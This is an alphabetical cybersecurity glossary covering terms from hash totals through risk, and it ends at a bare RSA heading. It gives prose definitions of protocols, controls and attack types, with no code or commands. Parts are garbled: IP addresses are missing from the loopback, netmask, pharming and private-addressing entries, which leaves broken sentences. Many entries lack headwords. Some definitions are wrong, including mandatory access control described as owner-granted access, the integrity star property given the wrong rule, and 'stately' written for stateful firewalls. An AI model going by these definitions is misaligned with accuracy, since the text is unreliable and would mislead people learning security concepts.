A hash total is a method of verifying the accuracy of data; it includes adding up the data in different fields including fields, which have no significance such as account numbers, etc. The sum thus arrived should be the same as original, a mismatch in the totals indicates an error.
Hash value
A hash value is the result of applying a cryptographic hash function to data (e.g., a message).
Hashing is a system of generating string values with the help of algorithms to maintain data integrity and accuracy.
A header refers to the additional data at the beginning of a chunk of data (or packet) being stored or transmitted. The data that follows the header is called the payload or body. Note that it is important that the header is of clear and unambiguous format to allow for parsing.
High assurance guard hag
High assurance guard is an enclave boundary protection device that controls access between a local area network that an enterprise system has a requirement to protect, and an external network that is outside the control of the enterprise system, with a high degree of assurance. A guard that has two basic functional capabilities: a message guard and a directory guard. The message guard provides filter service for message traffic traversing the guard between adjacent security domains. The directory guard provides filter service for directory access and updates traversing the guard between adjacent security domains.
High availability
High availability is a failover feature to ensure availability during device or component interruptions.
High impact system
A high impact system is an information system in which at least one security objective (i.e., confidentiality, integrity, or availability) is assigned a fips 199 potential impact value of high. An information system in which at least one security objective (i.e., confidentiality, integrity, or availability) is assigned a potential impact value of high.
High impact
High impact is the loss of confidentiality, integrity, or availability that could be expected to have a severe or catastrophic adverse effect on organizational operations, organizational assets, individuals, other organizations, or the national security interests of the united states; (i.e., 1) causes a severe degradation in mission capability to an extent and duration that the organization is able to perform its primary functions, but the effectiveness of the functions is significantly reduced; 2) results in major damage to organizational assets; 3) results in major financial loss; or 4) results in severe or catastrophic harm to individuals involving loss of life or serious life threatening injuries).
Hijack attack
A hijack attack is a form of active wiretapping in which the attacker seizes control of a previously established communication association.
Hijacking is a network security attack by which the intruder takes control of a connection, while a session is in progress. The intruder gains unauthorized access to the information.
Honeyclient is a web browser-based high interaction client honeypot designed by Kathy Wang in 2004 and subsequently developed at mitre. It was the first open source client honeypot and is a mix of perl, c++, and ruby. Honeyclient is state-based and detects attacks on windows clients by monitoring files, process events, and registry entries.
A honeymonkey is an automated program that imitates a human user to detect and identify websites which exploit vulnerabilities on the internet. It is also known as a honey client.
Honeypot is a computer security program that simulates one or more network services that you define on your computer’s ports. An attacker may assume that you’re running weak services that can be used to break into the machine. A honeypot provides you advanced warning of a more concerted attack. Two or more honeypots on a network form a honeynet.
A hop occurs each time that a data packet is passed from one device (source) to the next device (destination). Data packets pass through bridges, routers, and gateways on the way.
Host based intrusion detection system hids
A host-based intrusion detection system (hids) is an intrusion detection system that monitors and analyses information from the operating system audit records occurring on the host. These operations are then compared to a predefined security policy norm. This analysis of the audit trail forces significant overhead requirements on the system due to the increased amount of processing power which must be utilized by the intrusion detection system. Depending on the size of the audit trail and the processing ability of the system, the review of audit data could result in the loss of a real-time analysis capability.
A network host is a computer or other device connected to a computer network. A network host is a network node that is assigned a network layer host address. A network host may offer information resources, services, and applications to users or other nodes on the network.
Hot site
A hot site is a fully operational offsite data processing facility equipped with hardware and software, to be used in the event of an information system disruption. Backup site that includes phone systems with the phone lines already connected. Networks will also be in place, with any necessary routers and switches plugged in and turned on. Desks will have desktop pcs installed and waiting, and server areas will be replete with the necessary hardware to support business-critical functions. Within a few hours, a hot site can become a fully functioning element of an organization.
Hot wash
A hot wash is a debrief conducted immediately after an exercise or test with the staff and participants.
Http proxy
An http proxy is a server that receives requests from your web browser and then, requests the internet on your behalf. It then returns the results to your browser.
Https (also called http over tls, http over ssl, and http secure) is an internet protocol used for secure communication over a computer network. Https is very important over insecure networks (such as public wifi), as anyone on the same local network can discover sensitive information not protected by https. Https consists of communication over hypertext transfer protocol (http) within a connection encrypted by transport layer security or its predecessor, secure sockets layer.
A hub is a network device that is a common connection point for devices in a network. These are commonly used to connect segments of a lan. A hub contains multiple ports. When a data packet is received at one port, it is transmitted to the other ports on the hub.
Hybrid attack
A hybrid attack is a blend of both a dictionary attack method as well as brute force attack. This means that while a dictionary attack method would include a wordlist of passwords, the brute-force attack would be applied to each possible password in that list.
Hybrid encryption
Hybrid encryption is a method of encryption that combines two or more encryption algorithms or systems. This method merges asymmetric and symmetric encryption in order to derive benefit from the strengths of each form of encryption. These strengths include speed and security respectively.
Hybrid security control
Hybrid security control is a security control that is implemented in an information system in part as a common control and in part as a system-specific control.
A hyperlink (usually highlighted by color or underscoring) could be a word, a phrase, or an image that refers to data or related information that the user can directly follow either by clicking or by hovering. A hyperlink points to a whole document or to a specific element within a document while a hypertext is text with hyperlinks.
Hypertext markup language html
Hypertext markup language (html) is a set of markup symbols or codes that are inserted in a file intended for display on a world wide web (www) browser page. This markup states the browser how to display a web page to the user.
Hypertext transfer protocol http
Http is the underlying protocol used by the world wide web (www). This protocol defines how messages are formatted and transmitted on the internet and what actions web servers and browsers should take in response to various commands.
Internet identity (iid) or internet persona is a social identity that an internet user creates on online communities and websites. While some users prefer using their real names online, others prefer to be anonymous and identify themselves by means of pseudonyms.
Incident handling
Incident handling is an action plan developed (by an organisation or individual) to counteract intrusions, cyber-theft, denial of service, fire, flood, and any other security-related events. It comprises six process steps: preparation, identification of attack, containment of attack, eradication, recovery, and analysis (lessons learned documentation).
An incident is an unplanned disruption or degradation of a network or system service and needs to be resolved immediately. An example of an incident is a server crash that causes a disruption in the business process. However, if the disruption is planned, say, a scheduled maintenance, it is not an incident.
Incremental backups
An incremental backup provides a backup of only those files that have changed, modified, or are new since the last backup. Incremental backups are often desirable as they consume minimum storage and are quicker to perform than differential backups.
Inetd stands for internet service daemon and is a super-server daemon on many unix systems to manage several internet services. This reduces the load of the system. This means that the network services such as telnet, file transfer protocol (ftp), and simple mail transfer protocol (smtp) can be activated on demand rather than running continuously.
Inference attack
An inference attack is a data mining technique used to illegally access information about a subject or database by analyzing data. This is an example of breached information security. Such an attack occurs when a user is able to deduce key or critical information of a database from trivial information without directly accessing it.
Information warfare
Information warfare (iw) is primarily a United States military concept that involves the use and management of information and communication technology in pursuit of a competitive advantage over an opponent. This concept may employ a combination of tactical information, assurance(s) that the information is valid, spreading of propaganda or disinformation to demoralise or manipulate the enemy and the public, undermining the quality of opposing force information and denial of information-collection opportunities to opposing forces.
Ingress filtering
Ingress filtering is used to ensure that all incoming packets (of data) are from the networks from which they claim to originate. Network ingress filtering is a commonly used packet filtering technique by many internet service providers to prevent any source address deceiving. This helps in combating several net abuse or crimes by making internet traffic traceable to its source.
Input validation attacks
Input validations attacks are when an attacker purposefully sends strange inputs to confuse a web application. Input validation routines serve as the first line of defence for such attacks. Examples of input validation attacks include buffer overflow, directory traversal, cross-site scripting and sql injection.
Integrity star property
Integrity star property means a user cannot access or read data of a lower integrity level than their own.
Integrity of a system or network is the assurance that information can only be accessed or modified by those who are authorised. Several measures are taken to ensure integrity. These include controlling the physical environment of networked terminals and servers, restricting access to data, and maintaining rigorous authentication practices. Data integrity can be threatened by environmental hazards, such as heat, dust, and electrical surges.
Internet control message protocol icmp
The internet control message protocol (icmp) is one of the key internet protocols and is used by network devices such as routers to generate error messages to the source ip address when network problems prevent delivery of ip packets. Any ip network device has the capability to send, receive or process icmp messages. This protocol is also used to relay query messages and is assigned protocol number 1.
Internet engineering task force ietf
The internet engineering task force (ietf) is a large open international community of network designers, operators, vendors, and researchers who are concerned with the evolution of the internet architecture and its smooth operations. This body defines the standard internet operating protocols such as tcp/ip. The ietf is supervised by the internet society internet architecture board (iab). The internet assigned numbers authority (iana) is the central coordinator for the assignment of unique parameter values for internet protocols.
Internet message access protocol imap
The internet message access protocol (imap) is a standard internet protocol that is used by email clients to retrieve email messages from a mail server over tcp/ip. Imap is defined by rfc 3501. An imap server typically listens on port number 143. Imap over ssl (imaps) is assigned the port number 993.
Internet protocol ip
The internet protocol (ip) is a communication protocol that is used for relaying datagrams across network boundaries. It has a routing function which enables inter-networking, and essentially establishes the internet.
Internet protocol security ipsec
Internet protocol security (ipsec) is a protocol suite for secure internet protocol (ip) communications by authenticating and encrypting each ip packet of a communication session. Ipsec can be used in protecting data flows between a pair of hosts (host-to-host), security gateways (network-to-network), or between a security gateway and a host (network-to-host).
Internet protocol
An internet protocol address (ip address) is a numerical label that is assigned to each device that is using internet protocol or any other protocol and is connected to an internet network. An ip address serves two basic functions, that is, host or network interface identification and location addressing.
Internet standard
An internet standard (std) is a normative specification (that is approved by the iesg and published as an rfc) of a technology or methodology applicable to the internet. Internet standards are created and published by the internet engineering task force (ietf). An internet standard is characterised by technical reliability and usefulness. The ietf also defines a proposed standard as a less mature but stable and well-reviewed specification.
The internet is the worldwide network of interconnected computers that use the internet protocol suite (or tcp/ip) to link billions of devices across globally. It carries an extensive range of information resources and services, such as the inter-linked hypertext documents and applications of the world wide web (www), electronic mail, telephony, and peer-to-peer networks for file sharing.
An interrupt is a signal sent to the processor by hardware or software indicating an event that needs immediate attention.
An intranet is a private or internal network that is accessible only to an organisation’s personnel. An intranet is established with the technologies for local area networks (lans) and wide area networks (wans).
Intrusion detection id
Intrusion detection (id) is a security management system for computers and networks. An id system gathers and analyses information on a computer or a network to identify possible security breaches which include both intrusions and misuse. This system uses vulnerability assessment which is a technology developed to assess the security of a computer system or network.
Ip flood
Ip flood is a type of denial of service attack where the victim or system is flooded with information that uses up all the available bandwidth and prevents legitimate users from access. When ip flood detection is enabled, the router has the ability to block malicious devices that are attempting to flood devices.
Ip forwarding
Ip forwarding is also known as internet routing. It is a process used to determine using which path a packet or datagram can be sent. Ip forwarding is an os option that allows a host to act as a router. A system that has more than one network interface card must have ip forwarding turned on in order for the system to be able to act as a router.
Ip spoofing
Ip spoofing is also known as ip address forgery or a host file hijack. It is a hijacking technique where a hacker impersonates as a trusted host to conceal his identity, spoof a website, hijack browsers, or gain access to a network.
The international organization for standardization (iso) is an international standard-setting body that is composed of voluntary representatives from various national standards organizations.
Issue specific policy
An issue-specific policy is intended to address specific needs within an organisation, such as a password policy.
Itu t
The itu telecommunication standardization sector (itu-t) is one of the three sectors of the international telecommunication union (itu). It coordinates standards for telecommunications. The international telegraph and telephone consultative committee (ccitt, from french: comité consultatif international téléphonique et télégraphique) was created in 1956, and was renamed itu-t in 1993. Itu became a United Nations specialized agency in 1947.
Jitter is any deviation in, or displacement of, the signal pulses in a high-frequency digital signal. The aberration can be in amplitude, phase timing, or the width of the signal pulse. Jitter is sometimes referred to as “packet delay variation,” or pdv. Controlling jitter is critical for a good online experience.
Jump bag
A jump bag is a container that has all the items necessary to respond to an incident inside to help mitigate the effects of delayed reactions.
Kerberos is a computer network authentication protocol and is ticket-based allowing nodes to communicate over a non-secure. Massachusetts institute of technology (mit) developed the kerberos to protect network services provided by the project athena. This protocol is based on the earlier needham–schroeder symmetric key protocol. Kerberos protocol messages are protected against snooping and replay attacks.
The kernel is an essential center of a computer operating system, the core that provides basic services for all other parts of the operating system. A synonym is nucleus. A kernel can be contrasted with a shell, the outermost part of an operating system that interacts with user commands. Kernel and shell are terms used more frequently in unix operating systems than in ibm mainframe or microsoft windows systems.
Lattice techniques
Lattice techniques use security designations to determine access to information.
Layer 2 forwarding protocol l2f
Layer 2 forwarding protocol (l2f) is an internet protocol, originally developed by cisco corporation, that uses tunnelling of ppp over ip to create a virtual extension of a dial-up link across a network, initiated by the dial-up server and transparent to the dial-up user.
Layer 2 tunneling protocol l2tp
An extension of the point-to-point tunneling protocol used by an internet service provider to enable the operation of a virtual private network over the internet.
Least privilege
Least privilege is the principle of allowing users or applications the least amount of permissions necessary to perform their intended function.
A legion is a software used to detect unprotected shares.
Lightweight directory access protocol ldap
Lightweight directory access protocol (ldap) is an open, vendor-neutral, industry standard application protocol used for accessing and maintaining distributed directory information services over an ip network.
Link state
Link-state routing protocols are one of the two main classes of routing protocols used in packet switching networks. The link-state protocol is performed by every switching node in the network. Every node creates a map of the connectivity to the network (in the form of a graph) displaying all the nodes that are connected to other nodes. Each node then calculates the next best logical path from it to every possible destination in the network. The collection of these best paths forms the node’s routing table.
List based access control
List based access control associates a list of users and their privileges with each object, such as a file directory or individual file. Each object has a security attribute that identifies its access control list. The list has an entry for each system user with access privileges. This list is implemented differently by each operating system.
Loadable kernel modules lkm
Loadable kernel modules (lkm) is an object file that contains code to extend the running kernel or the base kernel of an operating system. Lkms are usually used to add support for new hardware and/or file systems, and even for adding system calls.
Log clipping
Log clipping is the selective removal of log entries from a system log to hide a compromise.
Logic bombs
A logic bomb is a piece of code that is deliberately inserted into a system to trigger a malicious program. Viruses and worms often contain logic bombs that execute a certain payload at a pre-defined time or when some other condition is met. Some viruses attack their host systems on specific dates, such as friday the 13th or april fools’ day. Trojans that activate on certain dates are often called time bombs.
Logic gate
A logic gate is an elementary building block of a digital circuit. This device is used to implement a boolean function. It performs a logical operation on one or more logical inputs, and produces a single logical output.
Loopback address
A loopback address is a pseudo address that sends outgoing signals back to the same computer for testing. In a tcp/ip network, the loopback ip address is, and pinging this address always returns a reply unless the firewall prevents it.
Mac address
A media access control address (mac address) is also known as the physical address and is a unique identifier assigned to the network interface for communication. Mac addresses are generally used as a network address for most ieee 802 network technologies (including ethernet and wifi). Mac addresses are used in the media access control protocol sub-layer of the osi reference model.
Malicious code
Malicious code is any code in any part of a software system or script that is intended to cause undesired effects, security breaches, or damage to a system. Such codes actually gain unauthorised access to system resources or trick a user into executing other malicious logic. Malicious code describes a broad category of system security terms that includes attack scripts, viruses, worms, trojan horses, backdoors, and malicious active content.
Malware is a short term used for malicious software. Malware is defined as any software that is used to interrupt or disrupt computer operations, gather sensitive information, or gain access to certain files or programs.
Mandatory access control mac
Mandatory access control (mac) is a security approach that contains the ability of an individual resource owner to grant or deny access to resources or files on the system. Whenever a user tries to access an object, an authorisation rule is enforced by the os. Kernel examines these security aspects and decides whether the user can access or not. Any operation by any user is typically tested against a set of authorisation rules (aka policy) to determine if the operation is allowed.
Masquerade attack
A masquerade attack is any attack that uses a forged identity (such as a network identity) to gain unofficial access to a personal or organisational computer. Masquerade attacks are generally performed by using either stolen passwords and logins, locating gaps in programs, or finding a way around the authentication process. Such attacks are triggered either by someone within the organisation or by an outsider if the organisation is connected to a public network.
The md5 was designed by professor ronald l. Rivest of mit in 1991. The md5 message-digest algorithm is the most widely used cryptographic hash function producing a 128-bit (16-byte) hash value, typically expressed in text format as a 32 digit hexadecimal number. It was developed to be used with digital signature applications that require large files to be compressed by a secure method before being encrypted with a secret key, under a public key cryptosystem. Md5 is currently a standard internet engineering task force (ietf) request for comments (rfc) 1321.
Measures of effectiveness moe
The measures of effectiveness (moe) is a probability model based on engineering concepts that allows one to estimate the impact of a given action on an environment. Moe quantifies the results to be obtained by a system and may be expressed as probabilities that the system will perform as required.
Monoculture is the case where a large number of users run the same software, and are vulnerable to the same attacks.
Morris worm
The morris worm (or internet worm) program was written by a graduate student at cornell university, robert tappan morris, and launched on november 2, 1988 from mit. It was the first computer worm distributed via the internet and gained significant mainstream media attention.
An ip multicast is a method of sending packets of data to a group of receivers in a single transmission. This method is often used to stream media applications on the internet and private networks.
Multi homed
Multi-homed is any computer host that has multiple ip addresses to connected networks. A multi-homed host is physically connected to multiple data links that can be on the same or different networks. Multihoming is commonly used in web management for load balancing, redundancy, and disaster recovery.
Multiplexing is a technique by which multiple analog or digital data streams are combined into one signal over a shared medium. Multiplexing originated in telegraphy in the 1870s, and is now widely applied in communications. The multiplexed signal is transmitted over a communication channel, such as a cable. A reverse process, known as demultiplexing, extracts the original channels on the receiver end.
Network address translation (nat) is an approach that is used to remap an IP address space into another by modifying network address information in ip datagram packet headers while they are in transit. This technique was originally used for rerouting traffic in ip networks without renumbering every host. Typically home or small business networks use nat to share a single dsl or cable modem ip address. However, in some cases nat is used for servers as an additional layer of protection.
National institute of standards and technology nist
The national institute of standards and technology (nist) is a non-regulatory federal agency within the u.s. department of commerce. NIST’s mission is to promote U.S. innovation and industrial competitiveness by advancing measurement science, standards, and technology in ways that enhance economic security and improve our quality of life.
Natural disaster
Natural disasters are any act of god or natural event caused by environmental factors. Some examples of these disasters include fire, flood, earthquake, lightning, or wind and disables the system, part of it, or a network of systems.
A netmask is a string of 0’s and 1’s that screens out the network part of an ip address so that only the host computer part of the address remains. The binary 1’s at the beginning of the mask turn the network id part of the ip address into 0’s. The binary 0’s that follow allow the host id to remain. In a netmask, two bits are always automatically assigned. For example, in, “0” is the assigned network address, and in, “255” is the assigned broadcast address. The 0 and 255 are always assigned and cannot be used.
Network based ids
Network-based intrusion detection systems (nids) are placed at a strategic point (or points) to monitor the traffic on the network. It analyses the passing traffic on the entire subnet, and matches the traffic that is passed on the subnets to the library of known attacks. When an attack is identified, or abnormal behaviour is detected, an alert is sent to the administrator. Opnet and netsim are commonly used tools for simulation network intrusion detection systems.
Network mapping
Network mapping is the study of physical connectivity of networks. It is used to compile an electronic inventory of the systems and the services on any network. With the increase in complexities of networks, automated network mapping has become more popular.
Network taps
Network taps are hardware devices that help in accessing the data flow across a computer network. It is also desirable for a third party to monitor the traffic between two points in the network. The network tap has (at least) three ports, an a port, a b port, and a monitor port. Network taps are generally used for network intrusion detection systems, voip recording, network probes, rmon probes, packet sniffers, and other monitoring and collection devices and software that require access to a network segment.
Non printable character
A non-printable character is a character that doesn’t have a corresponding character letter to its corresponding ascii code. Examples would be the linefeed, which is ascii character code 10 decimal, the carriage return, which is 13 decimal, or the bell sound, which is decimal 7. On a pc, you can often add non-printable characters by holding down the alt key, and typing in the decimal value (i.e., alt-007 gets you a bell). There are other character encoding schemes, but ascii is the most prevalent.
Non repudiation
Non-repudiation refers to the ability of a system to prove that a specific user and only that specific user sent a message and that it hasn’t been modified. On the internet, a digital signature is used not only to ensure that a message or document has been electronically signed by the person, but also, since a digital signature can only be created by one person, to ensure that a person cannot later deny that they furnished the signature.
Null session
A null session is also known as anonymous logon. It is a method that allows an anonymous user to retrieve information such as user names and share this over the network, or connect without authentication. Null sessions are one of the most commonly used methods for network exploration employed by “hackers.” A null session connection allows you to connect to a remote machine without using a username or password. Instead, you are given anonymous or guest access.
An octet is a unit of digital information that consists of eight bits. Octets are generally displayed using a variety of representations, for example in the hexadecimal, decimal, or octal number systems. The binary value of all 8 bits set (or turned on) is 11111111, equal to the hexadecimal value ff, the decimal value 255, and the octal value 377. One octet can be used to represent decimal values ranging from 0 to 255.
One way encryption
One-way encryption or one-way hash function is designed in a manner that it is hard to reverse the process, that is, to find a string that hashes to a given value (hence the name one-way). A good hash function makes it hard to find two strings that would produce the same hash value.
One way function
A one-way function is any function that is easy to compute on every input, but hard to invert given the image of a random input.
Open shortest path first ospf
An open shortest path first (ospf) is a routing protocol for ip networks and uses a link-state routing algorithm. It falls into the group of interior routing protocols, operating within a single autonomous system (as). Ospf is the most commonly used interior gateway protocol (igp) in large enterprise networks.
Osi layers
The open system interconnection (osi) model defines a networking framework to implement protocols in seven layers. Control is passed from one layer to the next, starting at the application layer in one station, and proceeding to the bottom layer, over the channel to the next station and back up the hierarchy. The osi model takes the task of internetworking and divides that up into what is referred to as a vertical stack that consists of the following layers. 1. Physical (layer 1) – this layer conveys the bit stream, electrical impulse, light, or radio signal through the network at the electrical and mechanical level. Fast ethernet, rs232, and atm are protocols with physical layer components. 2. Data link (layer 2) – at this layer, data packets are encoded and decoded into bits. The data link layer is divided into two sub layers: the media access control (mac) layer and the logical link control (llc) layer. 3. Network (layer 3) – this layer provides switching and routing technologies, creating logical paths, known as virtual circuits, for transmitting data from node to node. 4. Transport (layer 4) – this layer provides transparent transfer of data between end systems, or hosts, and is responsible for end-to-end error recovery and flow control. It ensures complete data transfer. 5. Session (layer 5) – this layer establishes, manages and terminates connections between applications. 6. Presentation (layer 6) – this layer provides independence from differences in data representation (e.g., encryption) by translating from application to network format, and vice versa. 7. Application (layer 7) – this layer supports application and end-user processes. This layer provides application services for file transfers, e-mail, and other network software services. Telnet and ftp are applications that exist entirely at the application level.
Osi stands for open system interconnection and is an iso standard for worldwide communications. Osi defines a networking framework for implementing protocols in seven layers. Osi defines seven layers of functions that take place at each end of a communication. Although osi is not always strictly adhered to in terms of keeping related functions together in a well-defined layer, many products involved in telecommunication attempt to describe themselves in relation to the osi model.
Overload is defined as the limitation of system operation by excessive burden on the performance capabilities of a system component.
Packet switched network psn
A packet switched network (psn) is a computer communications network that groups and sends data in the form of small packets. It enables sending of data packets between a source and destination node over a channel that is shared between multiple users and/or applications. A packet switch is also known as a connectionless network, as it does not create a permanent connection between a source and destination node.
A packet is a unit of data that is routed between an origin and a destination on the internet or any other packet-switched network. When any file (such as e-mail message, html file, graphics interchange format file, uniform resource locator request) is sent from one place to another, the transmission control protocol (tcp) layer of tcp/ip divides the file into smaller chunks ideal for routing.
Partitioning is the division of a computer hard disk or other secondary storage into one or more regions. Many computers have hard disk drives with only a single partition but others have multiple partitions so that an os can manage information in each region separately. Each partition then appears in the os as a distinct logical disk that uses part of the actual disk.
Password authentication protocol pap
Password authentication protocol (pap) is the most basic form of authentication in which a user’s name and password are transmitted over a network and compared to a table of name-password pairs. The basic authentication feature built into the http protocol uses pap.
Password cracking
Password cracking is the process of trying to guess or crack passwords to gain access to a computer system or network. Crackers generally use a variety of tools, scripts, or software to crack a system password. Password cracks work by comparing every encrypted dictionary word against the entries in the system password file until a match is found.
Password sniffing
Password sniffing is a technique used to gain knowledge of passwords that involves monitoring traffic on a network to pull out information. There are several softwares available for automatic password sniffing.
A patch is a piece of software designed and created to update a computer program or its supporting data, to fix or improve it. This includes fixing security vulnerabilities and other bugs, usually called bug fixes. Each patch is created to improve the usability and/or performance of the system or application.
Patching is the process of updating software to a different version. It is also referred to as updating the software to the latest version available and is key in removing bugs of the previous version.
A payload is the actual application data a packet contains. It is part of the transmitted data which is the fundamental purpose of the transmission. In summary, payload refers to the actual intended message in a transmission.
Penetration testing
Penetration testing is also called pen testing. It is the practice of testing a computer system, network or web application to find vulnerabilities that an attacker or attacker could exploit.
Penetration is defined as gaining unauthorised logical access to sensitive data by evading a system’s protections.
Permutation is a technique that keeps the same letters but changes the position within a text to scramble the message.
Personal firewall
Personal firewalls are those firewalls that are installed and run on individual computers. A personal firewall is an application which controls network traffic to and from a computer, permitting or denying communications based on a security policy. Typically it works as an application layer firewall.
Pharming is defined as a cyber attack that is intended to redirect a website’s traffic to a masquerading website, which may be a fake one. Pharming is achieved by corrupting a dns server on the internet and steering a url to the masked website’s ip. Generally all users use a url like instead of the real ip ( of the website. The url can be redirected to send traffic to the ip of the pseudo website by substituting the pointers on a dns server. The transactions can be imitated and information like login credentials can be gathered at the pseudo site. Using the information gathered, the attacker can access the real site and conduct transactions using the credentials of a valid user.
Phishing is an attempt to acquire sensitive information such as usernames, passwords, and credit card details by impersonating as a trustworthy entity. Phishing emails may contain links to websites that are infected with malware. Phishing is typically carried out by email spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one.
Ping of death
A ping of death is an attack that involves sending a distorted or otherwise malicious ping to a computer with the intent of overflowing the input buffers of the destination machine and causing it to crash. A ping of death is fragmented into groups of 8 octets before transmission.
Ping scan
A ping scan looks for machines that are responding to icmp echo requests.
Ping sweep
A ping sweep is a technique that is used to establish a range of ip addresses mapping to live hosts. Well-known tools with ping sweep capability include nmap for unix systems, and the pinger software from rhino9 for windows nt. There are many other tools with this capability, including: hping, simple nomad’s icmpenum, solarwinds ping sweep, and foundstone’s superscan. Pings can be detected by protocol loggers like ippl.
Plaintext is the most portable format and is supported by almost every application. In cryptography, plaintext refers to any message that is not encrypted.
Point to point protocol ppp
Point-to-point protocol (ppp) is a communication protocol between two computers that uses a serial interface, typically a personal computer connected by a phone line to a server. Ppp uses the internet protocol (ip) and is sometimes considered a member of the tcp/ip suite of protocols.
Point to point tunneling protocol pptp
The point-to-point tunneling protocol (pptp) is an approach used to implement virtual private networks (vpn). Pptp uses a control channel over tcp and a gre tunnel operating to encapsulate ppp packets.
Poison reverse
Poison reverse is a method where the gateway node communicates its neighbour gateways that one of the gateways is no longer connected. The notifying gateway sets the number of hops to the unconnected gateway to a number that indicates “infinite”. In effect, advertising the fact that their routes are not reachable.
Polyinstantiation is the ability of a database to maintain multiple records with the same key. It is used to prevent inference attacks. It may also indicate, such as in the case of database polyinstantiation, that two different instances have the same name (identifier, primary key).
Polymorphism is the process where malicious software changes its underlying code to avoid detection. A polymorphic type is one whose operations can also be applied to values of some other type, or types.
Port scan
A port scan is a sequence of messages sent by an attacker attempting to break into a computer. Port scanning provides the attacker an idea where to probe for weaknesses. A port scan consists of sending a message to each port, one at a time.
A port is an end point of communication in an operating system. It is identified for each address and protocol by a 16-bit number, commonly known as the port number.
Possession is the holding, control, and ability to use information.
Post office protocol version 3 pop3
Post office protocol, version 3 (pop3) is an internet standard protocol through which a client workstation can access a mailbox on a server host to retrieve mail messages that the server has received and is holding for the client.
Practical extraction and reporting language perl
Perl is a family of high-level, general-purpose, dynamic programming languages. These languages include perl 5 and perl 6. Perl was originally developed by Larry Wall in 1987 as a general-purpose unix scripting language.
A preamble is a signal used in communications to synchronize the transmission timing between two or more systems. A preamble defines a specific series of transmission pulses that is understood by communicating systems. This ensures that systems receiving the information correctly interpret when the data transmission starts. The actual pulses used as a preamble vary depending on the network communication technology in use.
Pretty good privacy pgp tm
Pretty good privacy (pgp) tm is a trademark data encryption and decryption program. This program provides cryptographic privacy and authentication for data communication. It was created by phil zimmermann in 1991. Pgp is generally used for encrypting and decrypting texts, e-mails, files, directories, and whole disk partitions and to increase the security of e-mail communications.
Private addressing
Iana has set aside three address ranges for use by private or non-internet connected networks. This is referred to as private address space and is defined in rfc 1918. The reserved address blocks are: to (10/8 prefix) to (172.16/12 prefix) to (192.168/16 prefix).
program infector
A program infector is a piece of malware (or virus) that attaches itself to existing program files. Once the original infected program is run the virus transfers to the computer memory and may replicate itself further, spreading the infection. This type of virus can be spread beyond one’s system as soon as the infected file or program is passed to another computer.
Program policy
A program policy is a high-level policy that sets the overall tone of an organisation’s security approach.
Promiscuous mode
Promiscuous mode allows a network device to intercept and read each network packet that reaches in its entirety. This is used by network administrators to diagnose network problems, but also by unsavoury characters who are trying to eavesdrop on network traffic (which might contain passwords or other information).
Proprietary information
Proprietary information is that information unique to a company and its ability to compete, such as customer lists, technical data, product costs, and trade secrets.
Protocol stacks osi
Protocol stacks are a set of network protocol layers that work together.
A protocol is a special set of rules that end points in a telecommunication connection when they communicate. Protocols specify interactions between the communicating entities. Protocols exist at several levels in a telecommunication connection.
Proxy server
A proxy server is a server that acts as an intermediary for requests from clients seeking resources from other servers. A proxy server is associated with or part of a gateway server that separates the enterprise network from the outside network and a firewall server that protects the enterprise network from outside intrusion. Most proxies are web proxies, facilitating access to content on the world wide web and providing anonymity.
Public key encryption
Public key encryption is also known as asymmetric cryptography. Public key encryption is a cryptographic system that uses two keys, a public key known to everyone and a private or secret key known only to the recipient of the message.
Public key forward secrecy pfs
Public-key forward secrecy (pfs) is a key agreement protocol based on asymmetric cryptography. It ensures that a session key derived from a set of long-term public and private keys will not be compromised if one of the private keys is compromised in the future.
Public key infrastructure pki
A public key infrastructure (pki) is a set of hardware, software, people, policies, and procedures needed to create, manage, distribute, use, store, and revoke digital certificates and manage public-key encryption. It enables users of an unsecured network to securely exchange data and money through the use of a public and a private cryptographic key pair that is obtained through a trusted authority. The public key infrastructure provides for a digital certificate that can identify an individual or an organization and directory services that can store and, when necessary, revoke the certificates.
Public key
A public key is the publicly-disclosed component of a pair of cryptographic keys used for asymmetric cryptography.
A qaz is a network worm.
Race condition
Race condition is also known as race hazard. Race condition is the behavior of an electronic, software, or other system where the output is dependent on the sequence or timing of other uncontrollable events. This becomes a bug when events don’t happen in the order the programmer planned. Race conditions can occur in electronics systems, especially logic circuits, and in computer software, especially multithreaded or distributed programs.
Radiation monitoring
Radiation monitoring is the process of receiving images, data, or audio from an unprotected source by snooping to radiation signals.
Reconnaissance is the phase of an attack where an attacker is able to locate new systems, maps out several networks, and probes for specific vulnerabilities in the system or network. It is used to obtain information by either visual observation or other detection methods about the activities and resources of an attacker.
Reflexive acls cisco
Reflexive access lists are an important part of securing the network against network hackers and is generally included in a firewall defence. Reflexive access lists provide a level of security against spoofing and denial-of-service attacks. Reflexive acls for Cisco routers are a step towards making the router act like a stately firewall. The router makes filtering decisions based on whether connections are a part of established traffic or not.
Registry is a system-defined database where applications and system components store and retrieve configuration data. Applications use the registry api to retrieve, modify, or delete registry data.
Regression analysis
The use of scripted tests which are used to test software for all possible input is expected. Typically developers will create a set of regression tests that are executed before a new version of a software is released.
Request for comment rfc
A request for comments (rfc) is a type of publication from the internet engineering task force (ietf) and the internet society. An rfc is authored by engineers and computer scientists in the form of a memorandum describing methods, behaviors, research, or innovations applicable to the working of the internet and internet-connected systems. Rfc started in 1969, when the internet was the arpanet.
Resource exhaustion
Resource exhaustion is a kind of attack where the attacker or hacker ties up finite resources on a system, making them unavailable to others.
A response is information that is sent in response to some stimulus.
Reverse address resolution protocol rarp
Reverse address resolution protocol (rarp) is a protocol where a physical machine in a local area network (lan) can request to learn its ip address from a gateway server’s address resolution protocol (arp) table or cache. When a new machine is set up, its rarp client program requests from the rarp server on the router to be sent its ip address.
Reverse engineering
Reverse engineering is also known as the “back engineering” and is the process of extracting design information or any kind of sensitive information by disassembling and analyzing the design of a system component.
Reverse lookup
The reverse lookup is used to locate the hostname that corresponds to a particular ip address. Reverse lookup uses an ip (internet protocol) address to find a domain name.
Reverse proxy
A reverse proxy is a device or service that is placed between a client and a server in a network. All the incoming http requests are handled by the proxy (back-end web servers), so the proxy can then send the content to the end-user.
Risk assessment
Risk assessment is a systematic process to analyze and identify any possible threats or risks that may leave sensitive information vulnerable to attacks. It also employs methods to calculate the risk impact and eliminate such threats.
Risk averse
Risk averse means avoiding risks even if this leads to the loss of opportunity. An example is using a (more expensive) phone call vs. Sending an email in order to avoid risks associated with email may be considered “risk averse”.
Risk is the probability of a system or network attack. Risk is the potential of losing valuable and sensitive information.
Rivest shamir adleman rsa
